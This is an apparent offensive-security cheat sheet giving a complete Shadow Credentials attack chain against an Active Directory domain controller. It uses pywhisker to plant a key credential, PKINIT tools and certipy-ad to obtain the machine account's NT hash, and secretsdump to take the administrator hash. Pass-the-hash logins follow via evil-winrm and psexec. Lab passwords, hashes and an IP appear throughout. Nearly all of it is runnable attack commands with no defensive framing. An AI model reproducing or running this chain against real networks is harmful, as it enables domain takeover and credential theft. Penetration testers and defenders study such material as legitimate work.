Shadow Credentials
pywhisker & gettgtpkinit & getnthash
certify-ad
Post-Exploitation
Last updated
Last updated
#Enumerate existing
pywhisker -d ignite.local -u "krishna" -p "Password@1" --target "DC$" --action "list"
#Generate and add new public-private key pair
pywhisker -d "ignite.local" -u "krishna" -p "Password@1" --target "DC$" --action "add" --filename DC$
python gettgtpkinit.py -cert-pfx "/root/DC$.pfx" -pfx-pass eK2PeOlwG60EkPS2TNxX ignite.local/dc$ dc$.ccache
export KRB5CCNAME=/root/PKINITtools/dc$.ccache
python getnthash.py -key 86b989daa8099f4f9f04f14be14b33556f043c56b48b4d3c36ef030a65c9b3a0 ignite.local/dc$
certipy-ad shadow auto -u krishna@ignite.local -p Password@1 -account dc$
##Get hash
impacket-secretsdump -hashes :9df8e4935c53f1a8a007dad9a96232e3 'ignite/dc$@ignite.local' -just-dc-user administrator
#Login
evil-winrm -i 192.168.1.58 -u administrator -H 32196b56ffe6f45e294117b91a83bf38
impacket-psexec -hashes :32196b56ffe6f45e294117b91a83bf38 ignite.local/administrator@192.168.1.58